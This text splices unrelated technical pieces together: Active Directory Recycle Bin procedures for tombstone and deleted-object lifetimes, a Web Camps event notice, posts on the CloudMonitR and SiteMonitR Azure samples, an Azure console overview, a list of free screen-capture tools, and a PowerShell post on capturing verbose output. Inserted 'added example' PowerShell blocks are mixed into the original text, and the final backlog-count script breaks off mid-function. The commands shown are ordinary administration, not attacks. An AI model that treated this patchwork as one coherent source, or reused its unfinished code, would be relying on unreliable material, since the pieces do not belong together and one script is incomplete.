The tombstone lifetime is determined by the value of the tombstoneLifetime attribute. The deleted object lifetime is determined by the value of the msDS-deletedObjectLifetime attribute. By default, tombstoneLifetime is set to null. When tombstoneLifetime is set to null, the tombstone lifetime defaults to 60 days (hard-coded in the system). By default, msDS-deletedObjectLifetime is also set to null. When msDS-deletedObjectLifetime is set to null, the deleted object lifetime is set to the value of the tombstone lifetime.

If the tombstoneLifetime value is empty, the tombstone lifetime is 60 days. If the value is not empty, the tombstone lifetime is the value specified. If the value is less than 3 days, the tombstone lifetime is 3 days.

You can modify the values of the tombstoneLifetime and msDS-deletedObjectLifetime attributes anytime by using the Set-ADObject cmdlet in the Active Directory module for Windows PowerShell (the recommended method) or by using the Ldp.exe administrative tool.
Membership in Enterprise Admins, or equivalent, is the minimum required to complete these procedures. Review details about using the appropriate accounts and group memberships at Local and Domain Default Groups (

  1. Click Start, click Administrative Tools, right-click Active Directory Module for Windows PowerShell, and then click Run as administrator.
  2. At the Active Directory module for Windows PowerShell command prompt, type the following command, and then press ENTER:
    Set-ADObject -Identity "CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=,DC=" -Partition "CN=Configuration,DC=,DC=" -Replace:@{"tombstoneLifetime" = }
    Replace DC=,DC= with the appropriate forest root domain name of your Active Directory environment, and replace with the new value for the tombstone lifetime.
    For example, to set tombstoneLifetime to 365 days, run the following command:
    Set-ADObject -Identity "CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=contoso,DC=com" -Partition "CN=Configuration,DC=contoso,DC=com" -Replace:@{"tombstoneLifetime" = 365}

For more information about the Set-ADObject cmdlet, at the Active Directory module for Windows PowerShell command prompt, type Get-Help Set-AdObject, and then press ENTER.

  1. To open Ldp.exe, click Start, click Run, and then type ldp.exe.
  2. To connect and bind to the server that hosts the forest root domain of your Active Directory environment, under Connections, click Connect, and then click Bind.
  3. In the console tree, right-click the CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration container, and then click Modify.
  4. In the Modify dialog box, in Edit Entry Attribute, type tombstoneLifetime.
  5. In the Modify dialog box, in Values, type the number of days that you want to set for the tombstone lifetime value. (The minimum is 3 days.)
  6. In the Modify dialog box, under Operation click Replace, click Enter, and then click Run.

  1. Click Start, click Administrative Tools, right-click Active Directory Module for Windows PowerShell, and then click Run as administrator.
  2. At the Active Directory module for Windows PowerShell command prompt, type the following command, and then press ENTER:
    Set-ADObject -Identity "CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=,DC=" -Partition "CN=Configuration,DC=,DC=" -Replace:@{"msDS-DeletedObjectLifetime" = }
    Replace DC=,DC= with the appropriate forest root domain name of your Active Directory environment, and replace with the new value of the deleted object lifetime.
    For example, to set the deleted object lifetime to 365 days, run the following command:
    Set-ADObject -Identity "CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=contoso,DC=com" -Partition "CN=Configuration,DC=contoso,DC=com" -Replace:@{"msDS-DeletedObjectLifetime" = 365}

For more information about the Set-ADObject cmdlet, at the Active Directory module for Windows PowerShell command prompt, type Get-Help Set-AdObject, and then press ENTER.

  1. To open Ldp.exe, click Start, click Run, and then type ldp.exe.
  2. To connect and bind to the server hosting the forest root domain of your Active Directory environment, under Connections, click Connect, and then click Bind.
  3. In the console tree, right-click the CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration container, and then click Modify.
  4. In the Modify dialog box, in Edit Entry Attribute, type msDS-DeletedObjectLifeTime.
  5. In the Modify dialog box, in Values, type the number of days that you want to set for the tombstone lifetime value. (The minimum is 3 days.)
  6. In the Modify dialog box, under Operation click Replace, click Enter, and then click Run.
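The two lifetime procedures above, scripted as an added example that is not part of the appendix: it reads both attributes from the Directory Service object, derives the effective values using the rules stated earlier (null means 60 days, never below 3 days, and the deleted object lifetime falls back to the tombstone lifetime when unset), and then sets new values through Set-ADObject. The function names and the 365-day defaults are my assumptions; the configuration naming context is looked up rather than typed in.

```powershell
Import-Module ActiveDirectory

# Path of the object that carries both attributes, resolved for the current forest.
function Get-ADDirectoryServicePath {
    $config = (Get-ADRootDSE).configurationNamingContext
    "CN=Directory Service,CN=Windows NT,CN=Services,$config"
}

function Get-ADRecycleBinLifetime {
    $ds = Get-ADObject -Identity (Get-ADDirectoryServicePath) `
              -Properties tombstoneLifetime, 'msDS-DeletedObjectLifetime'

    # Effective tombstone lifetime: 60 days when unset, minimum 3 days.
    $tsl = if ($ds.tombstoneLifetime) { [int]$ds.tombstoneLifetime } else { 60 }
    if ($tsl -lt 3) { $tsl = 3 }
    # Effective deleted object lifetime: equals the tombstone lifetime when unset.
    $dol = if ($ds.'msDS-DeletedObjectLifetime') { [int]$ds.'msDS-DeletedObjectLifetime' } else { $tsl }

    New-Object PSObject -Property @{
        ConfiguredTombstoneLifetime     = $ds.tombstoneLifetime
        ConfiguredDeletedObjectLifetime = $ds.'msDS-DeletedObjectLifetime'
        EffectiveTombstoneLifetime      = $tsl
        EffectiveDeletedObjectLifetime  = $dol
    }
}

function Set-ADRecycleBinLifetime {
    [CmdletBinding(SupportsShouldProcess=$true)]
    param(
        [int]$TombstoneLifetime     = 365,   # assumed target values
        [int]$DeletedObjectLifetime = 365
    )
    $config = (Get-ADRootDSE).configurationNamingContext
    if ($PSCmdlet.ShouldProcess((Get-ADDirectoryServicePath), 'Replace lifetime attributes')) {
        Set-ADObject -Identity (Get-ADDirectoryServicePath) -Partition $config -Replace @{
            tombstoneLifetime            = $TombstoneLifetime
            'msDS-DeletedObjectLifetime' = $DeletedObjectLifetime
        }
    }
}

Get-ADRecycleBinLifetime | Format-List
Set-ADRecycleBinLifetime -TombstoneLifetime 365 -DeletedObjectLifetime 365 -WhatIf
Get-ADRecycleBinLifetime | Format-List    # re-read to confirm once run without -WhatIf
```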

In addition to using the Active Directory Recycle Bin themselves, administrators can delegate the following operations to selected users:

  • Deleting an Active Directory object
  • Viewing a deleted Active Directory object
  • Viewing a deleted Active Directory object’s deactivated links
  • Viewing tombstone Active Directory objects
  • Recovering a deleted Active Directory object
  • Manually recycling a deleted Active Directory object
  • Managing optional Active Directory Recycle Bin features

The following table outlines the access control mechanisms (ACMs) and the default permission levels that are required for each task that an administrator can delegate.

Task: Deleting objects
  Access control mechanism: Delete ACMs
  Default permission level: Domain Administrators

Task: Viewing deleted objects
  Access control mechanism: Read ACMs and the showDeletedObjects Lightweight Directory Access Protocol (LDAP) control, plus List Content and Read Property rights on the Deleted Objects container
  Note: You might need to take ownership of the Deleted Objects container in order to grant these permissions. For example, to take ownership of the Deleted Objects container using dsacls.exe, type:
    dsacls "CN=Deleted Objects,DC=Contoso,DC=com" /takeownership
  To grant List Content and Read Property rights on the Deleted Objects container, type:
    dsacls "CN=Deleted Objects,DC=Contoso,DC=com" /G CONTOSO\EricLang:LCRP
  For more information, see View or Set Permissions on a Directory Object.
  Default permission level: Domain Users

Task: Viewing deactivated links
  Access control mechanism: Read ACMs and the showDeactivatedLinks LDAP control
  Default permission level: Domain Users

Task: Viewing tombstones
  Access control mechanism: Read ACMs and the showTombstoneObjects LDAP control
  Default permission level: Domain Users

Task: Recovering deleted objects
  Access control mechanism: Write ACMs (on the object) and the reanimate-tombstone control access right (CAR) (on the naming context (NC))
  Default permission level: Domain Administrators

Task: Recycling deleted objects
  Access control mechanism: Write ACMs (on the object) and the reanimate-tombstone CAR (on the NC)
  Default permission level: Domain Administrators

Task: Managing optional features
  Access control mechanism: Manage-optional-features CAR (on the target object)
  Default permission level: Domain Administrators

For more information about how to delegate rights in an Active Directory environment, see the following:

All deleted Active Directory objects are recycled automatically when their deleted object lifetimes expire. In addition, administrators can recycle deleted Active Directory objects manually.
Membership in Domain Admins, or equivalent, is the minimum required to complete this procedure. Review details about using the appropriate accounts and group memberships at Local and Domain Default Groups (

  1. To open Ldp.exe, click Start, click Run, and then type ldp.exe.
  2. To connect and bind to the server that hosts the forest root domain of your AD DS environment, under Connections, click Connect, and then click Bind.
  3. In the console tree, navigate to the CN=Deleted Objects container.
  4. Right-click the deleted Active Directory object that you want to recycle, and then click Delete.
  5. In the Delete dialog box, make sure that the Extended check box is checked, and then click OK.
  6. To verify that the deleted Active Directory object is now recycled:
    1. In the Controls dialog box, on the Load Predefined menu, click Return recycled objects, and then click OK.
    2. In the console tree, navigate to the CN=Deleted Objects container, and then double-click the deleted Active Directory object that you recycled.
    3. In the details pane, verify that the isRecycled attribute on this object is set to TRUE.

In Windows Server 2008 R2, as in Windows Server 2008, you can use the Active Directory Domain Services (AD DS) auditing mechanism with the Directory Service Changes audit policy to log old and new values when changes are made to Active Directory objects and their attributes. We recommend that you implement auditing in your Active Directory environment to track all object deletions, object deletion times, and the account names that perform these object deletions. For more information, see the AD DS Auditing Step-by-Step Guide (
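As an added example (not code from the article), the PowerShell below runs the isRecycled check from step 6 across the whole Deleted Objects container and, in support of the auditing recommended above, lists the object-deletion events (event ID 5141) from a domain controller's Security log together with the account that performed each deletion. It assumes the ActiveDirectory module from RSAT and the rights listed in the table above; the domain controller name DC01 is a placeholder.

```powershell
# Added example, not code from the article. Assumes the ActiveDirectory
# module (RSAT) and the rights from the table above; 'DC01' is a placeholder.
Import-Module ActiveDirectory

function Get-DeletedObjectReport {
    param(
        # Domain controller to query; defaults to the PDC emulator of the current domain.
        [string]$Server = (Get-ADDomain).PDCEmulator
    )
    # -IncludeDeletedObjects asks the DC to return objects that carry isDeleted
    # (what Ldp.exe does with the showDeletedObjects control). The Deleted
    # Objects container itself has isDeleted set, so it is excluded by name.
    Get-ADObject -Server $Server -IncludeDeletedObjects `
        -Filter { isDeleted -eq $true -and name -ne 'Deleted Objects' } `
        -Properties isDeleted, isRecycled, whenChanged, lastKnownParent |
        ForEach-Object {
            [pscustomobject]@{
                Name            = $_.Name
                ObjectClass     = $_.ObjectClass
                # TRUE once the object has been recycled, manually (steps above)
                # or because its deleted object lifetime expired; absent otherwise.
                Recycled        = [bool]$_.isRecycled
                LastChanged     = $_.whenChanged
                LastKnownParent = $_.lastKnownParent
            }
        }
}

function Get-ADDeletionAudit {
    param(
        [string]$DomainController = 'DC01',          # placeholder name
        [datetime]$Since = (Get-Date).AddDays(-7)
    )
    # With the Directory Service Changes subcategory audited, each deletion is
    # logged as event 5141 in the Security log of the DC that performed it.
    Get-WinEvent -ComputerName $DomainController -ErrorAction SilentlyContinue `
        -FilterHashtable @{ LogName = 'Security'; Id = 5141; StartTime = $Since } |
        ForEach-Object {
            # Pull the named EventData fields out of the event XML.
            $xml  = [xml]$_.ToXml()
            $data = @{}
            foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            [pscustomobject]@{
                Time       = $_.TimeCreated
                Account    = '{0}\{1}' -f $data['SubjectDomainName'], $data['SubjectUserName']
                ObjectDN   = $data['ObjectDN']
                Class      = $data['ObjectClass']
                TreeDelete = $data['TreeDelete']
            }
        }
}

# Deleted objects still waiting in the container that could be recycled by hand:
Get-DeletedObjectReport | Where-Object { -not $_.Recycled } | Format-Table -AutoSize

# Who deleted what during the last week:
Get-ADDeletionAudit | Sort-Object Time | Format-Table -AutoSize
```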

Web Camps tour

Dallas isn’t the only stop for the Web Camps tour. Our other good buddy, Jon Galloway, has worked hard creating this year’s Web Camps content, and has been out on the road promoting all the awesome new stuff we’ve released with the ASP.NET framework and tools. Along with Mr. Hunter, I’ll be presenting demonstrations and content related to all of the awesome topics below:

  • Keynote: The ASP.NET Web Platform in Context
  • What’s new in ASP.NET 4.5 and Visual Studio 2012
  • Building and deploying websites with ASP.NET MVC 4
  • Creating HTML5 Applications with jQuery
  • Building a service layer with ASP.NET Web API
  • Leveraging your ASP.NET development skills to build apps for Office
  • Building and leveraging social web apps in ASP.NET
  • Building for the mobile web
  • Real-time communications with SignalR
  • Leveraging Windows Azure and Windows Azure Web Sites

So if you’re an ASP.NET developer, or you’ve been thinking about learning more about the new stuff available in the ASP.NET stack, come on out and join Scott Hunter and me on Friday, April 5 in Dallas, TX. We’ve got a whole series of these events lined up in lots of other places, so check out the other areas where we’ll be heading and join us at one of those great events, too.

Jon, myself, and the rest of the team welcome you to this great series of events. We hope to see you there!


The next Windows Azure code sample released by the Windows Azure Evangelism Team is the CloudMonitR sample. This code sample demonstrates how Windows Azure Cloud Services can be instrumented and their performance analyzed in real time using a SignalR Hub residing in a web site hosted with Windows Azure Web Sites. Using Twitter Bootstrap and Highcharts JavaScript charting components, the web site provides a real-time view of performance counter data and trace output. This blog post will introduce the CloudMonitR sample and give you some links to obtain it.


Last week I had the pleasure of travelling to Stockholm, Sweden to speak at a great community-run conference, CloudBurst 2012 (as well as a few other events, which will be covered in a future post very very soon). I decided to release a new Windows Azure code sample at the conference, and to use the opportunity to walk through the architecture and implementation of the sample with the participants. As promised during that event, this is the blog post discussing the CloudMonitR sample, which you can obtain either as a ZIP file download from the MSDN Code Gallery or directly from its repository.
Below, you’ll see a screen shot of CloudMonitR in action, charting and tracing away on a running Windows Azure Worker Role.
The architecture of the CloudMonitR sample is similar to a previous sample I recently blogged about, the SiteMonitR sample. Both samples demonstrate how SignalR can be used to connect Windows Azure Cloud Services to web sites (and back again), and both sites use Twitter Bootstrap on the client to make the GUI simple to develop and customizable via CSS.
The point of CloudMonitR, however, is to allow for simplistic performance analysis of single- or multiple-instance Cloud Services. The slide below is from the CloudBurst presentation deck, and shows a very high-level overview of the architecture.
As each instance of the Worker (or Web) Role you wish to analyze comes online, it makes an outbound connection to the SignalR Hub running in a Windows Azure Web Site. Roles communicate with the Hub to send up tracing information and performance counter data to be charted using the Highcharts JavaScript API. Likewise, user interaction initiated on the Windows Azure Web Sites-hosted dashboard to do things like add additional performance counters to observe (or to delete ones no longer needed on the dashboard) is communicated back to the SignalR Hub. Performance counters selected for observation are stored in a Windows Azure Table Storage table, and retrieved as the dashboard is loaded into a browser.

Available via NuGet, Too!

The CloudMonitR solution is also available as a pair of NuGet packages. The first of these packages, the simply-named CloudMonitR package, is the one you’d want to pull down to reference from a Web or Worker Role for which you need the metrics and trace reporting functionality. Referencing this package will give you everything you need to start reporting the performance counter and tracing data from within your Roles.
The CloudMonitR.Web package, on the other hand, won’t bring down a ton of binaries, but will instead provide you with the CSS, HTML, JavaScript, and a few image files required to run the CloudMonitR dashboard in any ASP.NET web site.


The newest sample from the Windows Azure Evangelism Team (WAET) is a real-time, browser-based web site monitor. The SiteMonitR front-end is blocked out and styled using Twitter Bootstrap, and Knockout.js was used to provide MVVM functionality. A cloud service pings sites on an interval (10 seconds by default, configurable in the worker’s settings) and notifies the web client of the sites’ up-or-down statuses via server-side SignalR conversations. Those conversations are then bubbled up to the browser using client-side SignalR conversations. The client also fires off SignalR calls to the cloud service to manage the storage functionality for the URLs to be monitored. If you’ve been looking for a practical way to use SignalR with Windows Azure, this sample could shed some light on what’s possible.
Architectural Overview
The diagram below walks through the various method calls exposed by the SiteMonitR SignalR Hub. This Hub is accessed by both the HTML5 client application and by the Cloud Service’s Worker Role code. Since SignalR supports both JavaScript and Native .NET client connectivity (as well as a series of other platforms and operating systems), both ends of the application can communicate with one another in an asynchronous fashion.
SiteMonitR Architectural Diagram
Each tier makes a simple request, then some work happens. Once the work is complete, the caller can call events that are handled by the opposite end of the communication. As the Cloud Service observes sites go up and down, it sends a message to the web site via the Hub indicating the site’s status. The moment the messages are received, the Hub turns around and fires events that are handled on the HTML5 layer via the SignalR jQuery plug-in. Given the new signatures and additional methods added in SignalR 0.5.3, not only is the functionality identical in how it behaves, but the syntax to make it happen in native .NET code and in JavaScript is almost identical as well. The result is a simple GUI offering a real-time view into any number of web sites’ statuses, all right within a web browser. Since the GUI is written using Twitter Bootstrap and HTML5 conventions, it degrades gracefully, performing great on mobile devices.
Where You Can Get SiteMonitR
As with all the other samples released by the WAET, the SiteMonitR source code is available for download on the MSDN Code Gallery site. You can view or clone the source code in the repository we set up for the SiteMonitR source. Should you find any changes or improvements you’d like to see, feel free to submit a pull request, too. Finally, if you find anything wrong with the sample, submit an issue via GitHub’s issue tab, and we’ll do what we can to fix the issues reported. The repository contains a Getting Started document that walks you through the whole process – with screen shots – of setting up SiteMonitR live in your very own Windows Azure subscription (if you don’t have one, get a free 90-day trial here).
Demonstration Video
Finally, the video below walks you through the process of downloading, configuring, and deploying the SiteMonitR to Windows Azure. In less than 10 minutes you’ll see the entire process, have your very own web site monitoring solution running in the cloud, and you’ll be confident you’ll be the first to know when any of your sites crash since you’ll see their statuses change in real-time. If the video doesn’t load properly for you, feel free to head on over to the Channel 9 post containing the video.

A few days after the SiteMonitR sample was released, Matias Wolowski added in some awesome functionality. Specifically, he added in the ability for users to add PhantomJS scripts that can be executed dynamically when sites’ statuses are received. Check out his fork of the SiteMonitR repository on I’ll be reviewing the code changes over the next few days to determine if the changes are low-impact enough that they can be pulled into the main repository, but the changes Matias made are awesome and demonstrate how any of the Windows Azure Evangelism Team’s samples can be extended by the community.


The new Microsoft Windows Azure console

Getting to know the new Microsoft Windows Azure console. The Windows Azure cloud services platform has seen a number of important changes in recent months: new features have been added, and the services for redundancy and replication scenarios in IaaS and PaaS have been strengthened.

The new console has TAP for the new features that are being brought to market.

In this screenshot you can see that the availability groups and the time setting have changed; the slideshow design gives a panoramic view of the configuration components of Windows Azure.

Significant improvements that have been included in Windows Azure:

• Virtual machines: support for the Chef and Puppet extensions, and a base price level for calculating instance cost. Networking: general availability of dynamic-routing VPN gateways and point-to-site VPN. Mobile services: preview of Visual Studio .NET support, integration with Azure Active Directory and offline support;

• Notification Hubs: support for Kindle Fire and integration with Visual Studio Server Explorer

• Autoscale: general availability. Storage: general availability of read-access geo-redundant storage. Scheduler: general availability

• Automation: launch of the new Azure Automation service

18 free programs to capture video of your screen

More than 18 free programs for creating screencasts by capturing or recording video of what we do on the desktop screen.

For reasons as diverse as creating a video tutorial for YouTube or capturing a gaming session, we may need to record the actions we take on our computer screen, perhaps with our own voice-over or by adding our webcam feed.

Here I present a list of more than 18 free programs for creating screencasts, that is, video captures of what you do on your desktop screen.

1. Hypercam 2

One of my favorite programs for capturing video under Windows is Hypercam. It is simple and easy to use: it lets you select regions or windows, set the fps (frames per second), choose an installed video codec (XviD, DivX, ...) to save space in the video, or highlight the mouse cursor’s interaction in different ways.

Hypercam 3 (from Solveig Multimedia) costs 29.95 euros, while Hypercam 2 (from Hyperionics) has become completely free and can be downloaded from its website in both 32-bit and 64-bit versions.

URL | Hypercam 2 ~ 1MB

2. Expression Encoder 4

Microsoft has a very interesting video editing program called Expression Encoder 4. There are several paid versions that are much more complete, such as Studio Web Pro ($149), Expression Encoder 4 Pro ($199) and Studio Ultimate ($599).

However, Expression Encoder 4 is free and can perform editing tasks as well as capture screen activity with the Expression Encoder Screen Capture codec, recording your desktop, webcam and even streaming, with very high quality results.

URL | Expression Encoder 4 ~ 28MB

3. Camstudio

Camstudio is open source software for capturing your screen to video. Like most of these programs, it lets you select a specific region, video options (codecs), audio (choose the microphone or the system sound), and even make notes on the screen or add a watermark automatically.

It also includes a lossless video codec, ideal for capturing videos without many textures where “flat” colors abound. More information in Image Formats: Optimization Guide.

URL | CamStudio ~ 4MB

4. BBFlashBack Express

BBFlashBack is another capture program, which also has a small editor for managing your recording. There are several versions of this software, BBFlashBack Pro ($199) and BBFlashBack Standard ($89); BBFlashBack Express, however, is free, and you only have to register to use it.

BBFlashBack Express can save captures as video (AVI) or Flash (SWF), including sound or webcam, and has a wizard to upload directly to YouTube, ideal for online tutorials.

URL | BBFlashBack Express ~ 12MB

5. Ezvid

There are many programs for creating screencasts, but if your goal is to create videos for YouTube without complications, there is one that is really appropriate: Ezvid.

With a clean and accessible interface, you can capture your screen activity, record audio from the microphone, synthesize speech, and also edit the result, add images, videos or secondary text, and include background music (from a specific copyright-free list).

That said, it should be noted that this is a very simple application (and possibly very limited for advanced users) that allows recordings of up to 10 minutes. In fact, it only allows uploading video directly to YouTube, with no option to export to a file.

URL | Ezvid ~ 1MB

If you are interested in more similar systems, very simple but web-based, you can try Screenr or Screencast-o-matic, both with free versions and paid plans with different features.

6. Freeseer

Freeseer is an open source project written in Python/Qt4, oriented toward recording screencasts on Linux and Windows platforms (Mac not yet available). It allows recording a specific region of the screen, recording via software or hardware, setting different resolutions or even streaming.

URL | Freeseer ~ 1MB

7. Istanbul

This simple but powerful program lets you select a window (or area) of a Linux desktop and record the activity that takes place in that region as video. It offers some basic options such as recording 3D activity, hiding the mouse pointer or recording sound.

The target format is Ogg Theora Video (OGV), a free video codec that is also free of patents. It works on desktop environments such as KDE, Gnome, XFCE and others.

URL | Istanbul

8. Jing

Jing is free software, developed by the creators of the well-known Camtasia (paid, 282 euros) and the not so well-known SnagIt (47.95 euros). While it is not as complete as its older siblings, it serves its purpose perfectly.

It lets you save the activity of your screen and export it to a Flash file (SWF). Videos are limited to 5 minutes in length and require free registration.

URL | Jing ~ 7MB

9. Wink

Another free program for creating presentations is Wink. It works on both Windows and Linux, and lets you capture with the ability to edit afterwards.

The output formats are somewhat different, since it is oriented toward desktop presentations and only allows exporting in Flash format (SWF), self-executing files (EXE), documents (PDF or PS) or images in HTML files.

URL | Wink ~ 3MB

10. RecordMyDesktop

For advanced Linux users, who are accustomed to using text terminals, we have RecordMyDesktop, a program that lets you capture your desktop screen (or a region of it) directly from a command with its own parameters, very useful for creating our own custom scripts.

The generated video format is Ogg Theora Video (OGV).

URL | recordMyDesktop

If this application does not convince you, you can try other similar programs such as glc, considered the Fraps (29.95 euros) of Linux, or byzanz, very similar to recordMyDesktop but supporting other formats such as GIF or FLV.

11. Capture Fox

There is a plugin for the Mozilla Firefox browser that lets you capture the screen in video format, called Capture Fox.

It is completely free, but unfortunately, at the time of writing, it is not compatible with the latest version of Firefox (16.0.1), so it can only be used from an earlier version.

URL | Capture Fox

12. ActivePresenter Free Edition

ActivePresenter Free Edition is a great video recording program for capturing screen activity, editing it, and exporting it to various video formats, including WMV, AVI, MPEG4 and WebM.

There are 3 different versions: ActivePresenter Standard ($349.95), ActivePresenter Professional ($449.95) and ActivePresenter Free Edition (free), which has no time limit on recording and does not add any advertising watermark.

URL | ActivePresenter

13. Cropper

Cropper is a little outside the scope of this list, since it is a program oriented toward capturing still images of your screen.

However, I wanted to include it for its ability to create animated GIFs, using the AnimatedGif plug-in, which lets you capture small processes or activities with “flat” colors optimally and taking up little space.

The plugin also lets you take screenshots and send them automatically to sites such as Facebook, Flickr, Imgur, Twitter and others.

URL | Cropper

14. Taksi

Taksi aims to be an open source alternative to the famous Fraps, allowing video recording of your desktop or even 3D games. It supports recording DirectX 8 and 9, OpenGL and even GDI.

NOTE: Although the official website mentions that audio capture is not functional (in v0.7.6), in the current version (v0.7.7.9-dev) it works correctly.

URL | Taksi

15. Ultra Screen Recorder

Ultra Screen Recorder starts from a very clever idea. It is a plugin for the UltraVNC software, a variant of the VNC remote administration program.

The idea is that, since most image recording applications consume a lot of resources and cannot run at a high fps (frames per second) rate, a remote administration program is used instead to capture the screen activity to video.

That said, it is advisable that only advanced users use it, since technical knowledge of networking and remote administration is needed.

URL | UVNC Screen Recorder

16. Krut

Krut is a cross-platform open source program (based on Java) that lets you capture video (and screen) into separate files with fairly high customization. Recordings are made in QuickTime (MOV) format and the sound in WAV format, separately.

URL | Krut

17. XFire

XFire is a messaging program for Windows that integrates into our games and allows capturing video and images and even streaming. You can register and download it from the XFire website.

URL | XFire

18. A method for advanced users

There are several applications with which you can also capture your screen to video with more specific parameters and probably much higher performance. However, this is only advisable for advanced users, since these methods are much more complex and less intuitive.

With the famous open source editor VirtualDub you can capture video, since it has an option (Capture AVI) that can record the activity of your desktop or webcam in video format. Some guides:

How to record games in HD FREE (better than FRAPS)
Real-time screen capturing With VirtualDub / VHScrCap
VideoLAN (VLC)

VLC is a great video player that offers many possibilities beyond (the most common) video playback, including network dumps, streaming or capturing screen activity to video. A guide follows:

How to use VLC as a free open source alternative to Playon TV

FFmpeg is a very powerful system for recording, capturing or transforming videos and formats, with which you can perform almost any video operation. Here is a guide using FFmpeg:

Stream your desktop windows using FFMpeg
Also worth mentioning is Screen Capture Recorder, a project on GitHub, which helps with video recording under Windows.

EXTRA: oCam

An incredible program for capturing fragments of the screen, simple, very comfortable and with a pleasant and simple interface. It supports codecs such as XviD, x264vfw or VP8, which you can download from codecs for oCam.


Programmatically capture Verbose Output in a PowerShell variable


I was playing around with the cmdlets in the DFSR module the other day and realized that none of them could (as far as I could tell) give me a reliable count on the number of items in the DFSR backlog.
My plan was to initiate a replication of two folders and then have a script monitor the backlog to generate status messages to keep me informed of the progress.
I searched for a way to accomplish this by looking at the commands in the DFSR module that have the verb Get:
PS C:\> Get-Command -Module DFSR -Verb Get


CommandType     Name                                               ModuleName
Cmdlet          Get-DfsrBacklog                                    DFSR
Cmdlet          Get-DfsrCloneState                                 DFSR
Cmdlet          Get-DfsrConnection                                 DFSR
Cmdlet          Get-DfsrConnectionSchedule                         DFSR
Cmdlet          Get-DfsReplicatedFolder                            DFSR
Cmdlet          Get-DfsReplicationGroup                            DFSR
Cmdlet          Get-DfsrFileHash                                   DFSR
Cmdlet          Get-DfsrGroupSchedule                              DFSR
Cmdlet          Get-DfsrIdRecord                                   DFSR
Cmdlet          Get-DfsrMember                                     DFSR
Cmdlet          Get-DfsrMembership                                 DFSR
Cmdlet          Get-DfsrPreservedFiles                             DFSR
Cmdlet          Get-DfsrServiceConfiguration                       DFSR
Cmdlet          Get-DfsrState                                      DFSR
Get-DfsrBacklog seems just like the thing I'm looking for. Just to make sure, I had a look at the help for that cmdlet
and got a little amazed when realizing that it would return only the first 100 objects in my replication backlog.
That's great and all, but what if I want the total count? Are there hundreds or millions of items in the backlog? There is no way (that I could find) to return the total number of objects in the backlog, BUT if the -Verbose switch is used the command will write a message to the Verbose stream stating something similar to:
The replicated folder has a backlog of files. Replicated folder: “ReplFolder”. Count: 46314
No backlog for the replicated folder named “ReplFolder”
And there it is folks! Anyone can run the command and read the verbose message. Anyone but my script which couldn’t care less about the Verbose stream. Or does it?
This is where a great little feature in PowerShell called redirection comes in handy. This feature was introduced already in PowerShell version 2.0, but back then it was limited to redirecting only two streams: the Success output (the common output that I usually refer to as the pipeline) and the Error stream. In PowerShell version 3.0 it got even more powerful, and now we can direct any of the five output streams (Success, Error, Warning, Verbose and Debug) either to the Success output stream or to a file of our choosing using the redirect operator '>'. The syntax is easy: first enter the number of the output stream that should be redirected, taken from the table below, followed by the operator > and the target of the redirection.
* All output
1 Success output
2 Errors
3 Warning messages
4 Verbose output
5 Debug messages
To test this I wrote a function that will output text to different streams.


function Write-ToStreams {
        # Make sure the Verbose and Debug streams are not silently discarded
        $VerbosePreference = 'Continue'
        $DebugPreference = 'Continue'
        Write-Host "This is written to host" -ForegroundColor Green
        Write-Output "This is written to Success output"
        Write-Error "This is an error"
        Write-Warning "This is a warning message"
        Write-Verbose "This is verbose output"
        Write-Debug "This is a debug message"
}
Which gives me the following output:
Now if I want to redirect my verbose output I’ll end my command with the number of the verbose output stream, ‘4’, followed by the redirect operator ‘>’ and the target of my redirection.
The other option is to redirect one output stream to the success output stream by using &1 as the target like this:
Which looks exactly like the first time we ran the command! But this time the verbose message is actually written to the output stream.
To test this let’s store the output in a variable:
And this is the answer to my problem with the count of files in the DFSR Backlog. I just have to separate the default output from the verbose output.
So let's start over by running the function Write-ToStreams and storing the output in a variable without redirection:
$Output = Write-ToStreams
This would output messages to all streams but the Success output, which would be caught by my $Output variable. To catch the other streams I use another feature called a subexpression. A subexpression is like a scripted variable: for example, by writing $(Get-Date -f $FormatString), the code within the parentheses is executed and the result is returned as if it came from a variable. By enclosing our previous example in a subexpression we get the opportunity to redirect the verbose output and capture it in another variable like this:
$VerboseMessage = $($Output = Write-ToStreams) 4>&1
This could be repeated for any of the remaining three streams: Error, Warning and Debug. A very important thing to notice here is the green text created by Write-Host. This text cannot be redirected or captured at all, which makes Write-Host something that should only be used if the intent is to write something to the screen, and never for actual output. Use any of the other streams for output.
To get back to my problem with the count of items in the DFSR backlog: I wrote a script that returns the number of items in the backlog for each replicated folder using this technique, and it is available on the TechNet Gallery.
For more information about redirection, please refer to the help article about_Redirection.
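The technique from the post, carried through end to end as an added example (not the author's TechNet Gallery script): Get-FakeBacklog is a constructed stand-in for Get-DfsrBacklog that returns at most 100 objects and reports the true total only on the Verbose stream, and Get-BacklogCount separates the two streams with a subexpression plus 4>&1 and parses the count out of the VerboseRecord messages.

```powershell
# Added example, not from the original post. Get-FakeBacklog is a stand-in for
# Get-DfsrBacklog: it emits at most 100 items on the Success stream and states the
# real total only on the Verbose stream, mirroring the behaviour the post describes.
function Get-FakeBacklog {
    [CmdletBinding()]
    param(
        [string]$FolderName = 'ReplFolder',
        [int]$TotalCount = 46314              # constructed sample value
    )
    if ($TotalCount -eq 0) {
        Write-Verbose "No backlog for the replicated folder named `"$FolderName`""
        return
    }
    Write-Verbose "The replicated folder has a backlog of files. Replicated folder: `"$FolderName`". Count: $TotalCount"
    # Only the first 100 objects ever reach the Success stream
    1..([Math]::Min($TotalCount, 100)) | ForEach-Object {
        [pscustomobject]@{ FolderName = $FolderName; FileName = "file$_.dat" }
    }
}

function Get-BacklogCount {
    [CmdletBinding()]
    param(
        [string]$FolderName = 'ReplFolder',
        [int]$TotalCount = 46314
    )

    # The subexpression keeps the Success stream in $items (wrapped in @() so an
    # empty backlog gives an empty array, not $null), while 4>&1 merges the
    # Verbose stream into the pipeline so it lands in $verbose instead.
    $verbose = $($items = @(Get-FakeBacklog -FolderName $FolderName -TotalCount $TotalCount -Verbose)) 4>&1

    # Redirected verbose output arrives as VerboseRecord objects; the text is in .Message
    $messages = $verbose |
        Where-Object { $_ -is [System.Management.Automation.VerboseRecord] } |
        ForEach-Object { $_.Message }

    # Pull the total out of the "Count: N" message; "No backlog" leaves it at 0
    $count = 0
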